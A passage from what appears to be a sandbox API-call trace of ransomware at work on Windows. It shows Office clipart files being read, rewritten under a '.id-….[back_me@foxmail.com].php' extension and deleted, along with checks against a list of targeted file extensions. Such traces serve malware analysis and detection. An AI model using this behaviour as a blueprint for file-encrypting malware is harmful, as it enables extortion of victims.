lpNumberOfBytesRead=0x36afed4*=0xd28, lpOverlapped=0x0) returned 1 [0263.503] WriteFile (in: hFile=0x38c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xd30, lpOverlapped=0x0) returned 1 [0263.504] ReadFile (in: hFile=0x3c0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.504] WriteFile (in: hFile=0x38c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.504] SetEndOfFile (hFile=0x38c) returned 1 [0263.504] CloseHandle (hObject=0x38c) returned 1 [0263.504] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.504] SetEndOfFile (hFile=0x3c0) returned 1 [0263.506] CloseHandle (hObject=0x3c0) returned 1 [0263.506] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.506] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf")) returned 1 [0263.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.507] lstrlenW (lpString=".doc") returned 4 [0263.507] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.507] lstrlenW (lpString=".docx") returned 5 [0263.507] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0263.507] lstrlenW (lpString=".pdf") returned 4 [0263.507] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.507] lstrlenW (lpString=".xls") returned 4 [0263.507] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.507] lstrlenW (lpString=".xlsx") returned 5 [0263.507] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0263.507] lstrlenW (lpString=".ppt") returned 4 [0263.507] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.507] lstrlenW (lpString=".zip") returned 4 [0263.507] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.507] lstrlenW (lpString=".rar") returned 4 [0263.507] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.507] lstrlenW (lpString=".bz2") returned 4 [0263.507] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.507] lstrlenW (lpString=".7z") returned 3 [0263.507] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.507] lstrlenW (lpString=".dbf") returned 4 [0263.507] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.508] lstrlenW (lpString=".1cd") returned 4 [0263.508] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.508] lstrlenW (lpString=".jpg") returned 4 [0263.508] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.508] lstrlenW (lpString=".doc") returned 4 [0263.508] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.508] lstrlenW (lpString=".docx") returned 5 [0263.508] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0263.508] lstrlenW (lpString=".pdf") returned 4 [0263.508] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.508] lstrlenW (lpString=".xls") returned 4 [0263.508] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.508] lstrlenW (lpString=".xlsx") returned 5 [0263.508] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0263.508] lstrlenW (lpString=".ppt") returned 4 [0263.508] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.508] lstrlenW (lpString=".zip") returned 4 [0263.508] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.508] lstrlenW (lpString=".rar") returned 4 [0263.508] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.508] lstrlenW (lpString=".bz2") returned 4 [0263.508] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.508] lstrlenW (lpString=".7z") returned 3 [0263.508] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.508] lstrlenW (lpString=".dbf") returned 4 [0263.508] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.509] lstrlenW (lpString=".1cd") returned 4 [0263.509] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63 [0263.509] lstrlenW (lpString=".jpg") returned 4 [0263.509] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.509] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.509] lstrlenW (lpString="J0152608.WMF") returned 12 [0263.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0263.509] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=12436) returned 1 [0263.509] CloseHandle (hObject=0x3c0) returned 1 [0263.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf")) returned 0x20 [0263.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0263.510] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.510] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0263.510] GetLastError () returned 0x0 [0263.510] ReadFile (in: hFile=0x3c0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x3094, lpOverlapped=0x0) returned 1 [0263.517] WriteFile (in: hFile=0x38c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x30a0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x30a0, lpOverlapped=0x0) returned 1 [0263.518] ReadFile (in: hFile=0x3c0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.518] WriteFile (in: hFile=0x38c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.518] SetEndOfFile (hFile=0x38c) returned 1 [0263.518] CloseHandle (hObject=0x38c) returned 1 [0263.518] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.518] SetEndOfFile (hFile=0x3c0) returned 1 [0263.520] CloseHandle (hObject=0x3c0) returned 1 [0263.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.520] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf")) returned 1 [0263.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.520] lstrlenW (lpString=".doc") returned 4 [0263.521] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.521] lstrlenW (lpString=".docx") returned 5 [0263.521] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0263.521] lstrlenW (lpString=".pdf") returned 4 [0263.521] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.521] lstrlenW (lpString=".xls") returned 4 [0263.521] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.521] lstrlenW (lpString=".xlsx") returned 5 [0263.521] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0263.521] lstrlenW (lpString=".ppt") returned 4 [0263.521] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.521] lstrlenW (lpString=".zip") returned 4 [0263.521] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.521] lstrlenW (lpString=".rar") returned 4 [0263.521] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.521] lstrlenW (lpString=".bz2") returned 4 [0263.521] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.521] lstrlenW (lpString=".7z") returned 3 [0263.521] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.521] lstrlenW (lpString=".dbf") returned 4 [0263.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.521] lstrlenW (lpString=".1cd") returned 4 [0263.521] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.521] lstrlenW (lpString=".jpg") returned 4 [0263.521] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.521] lstrlenW (lpString=".doc") returned 4 [0263.522] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.522] lstrlenW (lpString=".docx") returned 5 [0263.522] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0263.522] lstrlenW (lpString=".pdf") returned 4 [0263.522] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.522] lstrlenW (lpString=".xls") returned 4 [0263.522] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.522] lstrlenW (lpString=".xlsx") returned 5 [0263.522] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0263.522] lstrlenW (lpString=".ppt") returned 4 [0263.522] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.522] lstrlenW (lpString=".zip") returned 4 [0263.522] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.522] lstrlenW (lpString=".rar") returned 4 [0263.522] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.522] lstrlenW (lpString=".bz2") returned 4 [0263.522] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.522] lstrlenW (lpString=".7z") returned 3 [0263.522] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.522] lstrlenW (lpString=".dbf") returned 4 [0263.522] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.522] lstrlenW (lpString=".1cd") returned 4 [0263.522] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63 [0263.522] lstrlenW (lpString=".jpg") returned 4 [0263.522] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.523] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.523] lstrlenW (lpString="J0152610.WMF") returned 12 [0263.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0263.523] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=5960) returned 1 [0263.523] CloseHandle (hObject=0x3c0) returned 1 [0263.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf")) returned 0x20 [0263.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0263.523] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.523] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0263.524] GetLastError () returned 0x0 [0263.524] ReadFile (in: hFile=0x3c0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x1748, lpOverlapped=0x0) returned 1 [0263.614] WriteFile (in: hFile=0x38c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x1750, lpOverlapped=0x0) returned 1 [0263.615] ReadFile (in: hFile=0x3c0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.615] WriteFile (in: hFile=0x38c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.615] SetEndOfFile (hFile=0x38c) returned 1 [0263.615] CloseHandle (hObject=0x38c) returned 1 [0263.615] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.615] SetEndOfFile (hFile=0x3c0) returned 1 [0263.620] CloseHandle (hObject=0x3c0) returned 1 [0263.620] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.623] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf")) returned 1 [0263.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.633] lstrlenW (lpString=".doc") returned 4 [0263.633] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.633] lstrlenW (lpString=".docx") returned 5 [0263.633] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0263.633] lstrlenW (lpString=".pdf") returned 4 [0263.633] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.633] lstrlenW (lpString=".xls") returned 4 [0263.633] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.633] lstrlenW (lpString=".xlsx") returned 5 [0263.633] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0263.633] lstrlenW (lpString=".ppt") returned 4 [0263.633] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.633] lstrlenW (lpString=".zip") returned 4 [0263.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.633] lstrlenW (lpString=".rar") returned 4 [0263.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.633] lstrlenW (lpString=".bz2") returned 4 [0263.633] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.633] lstrlenW (lpString=".7z") returned 3 [0263.633] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.633] lstrlenW (lpString=".dbf") returned 4 [0263.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.633] lstrlenW (lpString=".1cd") returned 4 [0263.633] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.633] lstrlenW (lpString=".jpg") returned 4 [0263.634] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.634] lstrlenW (lpString=".doc") returned 4 [0263.634] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.634] lstrlenW (lpString=".docx") returned 5 [0263.634] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0263.634] lstrlenW (lpString=".pdf") returned 4 [0263.634] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.634] lstrlenW (lpString=".xls") returned 4 [0263.634] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.634] lstrlenW (lpString=".xlsx") returned 5 [0263.634] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0263.634] lstrlenW (lpString=".ppt") returned 4 [0263.634] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.634] lstrlenW (lpString=".zip") returned 4 [0263.634] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.634] lstrlenW (lpString=".rar") returned 4 [0263.634] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.634] lstrlenW (lpString=".bz2") returned 4 [0263.634] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.634] lstrlenW (lpString=".7z") returned 3 [0263.634] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.634] lstrlenW (lpString=".dbf") returned 4 [0263.634] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.634] lstrlenW (lpString=".1cd") returned 4 [0263.634] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63 [0263.635] lstrlenW (lpString=".jpg") returned 4 [0263.635] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.635] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.635] lstrlenW (lpString="J0152688.WMF") returned 12 [0263.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0263.635] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=34676) returned 1 [0263.635] CloseHandle (hObject=0x37c) returned 1 [0263.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf")) returned 0x20 [0263.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0263.635] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.636] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0263.636] GetLastError () returned 0x0 [0263.636] ReadFile (in: hFile=0x37c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x8774, lpOverlapped=0x0) returned 1 [0263.659] WriteFile (in: hFile=0x3ac, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x8780, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x8780, lpOverlapped=0x0) returned 1 [0263.660] ReadFile (in: hFile=0x37c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.660] WriteFile (in: hFile=0x3ac, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.660] SetEndOfFile (hFile=0x3ac) returned 1 [0263.660] CloseHandle (hObject=0x3ac) returned 1 [0263.660] SetFilePointerEx (in: 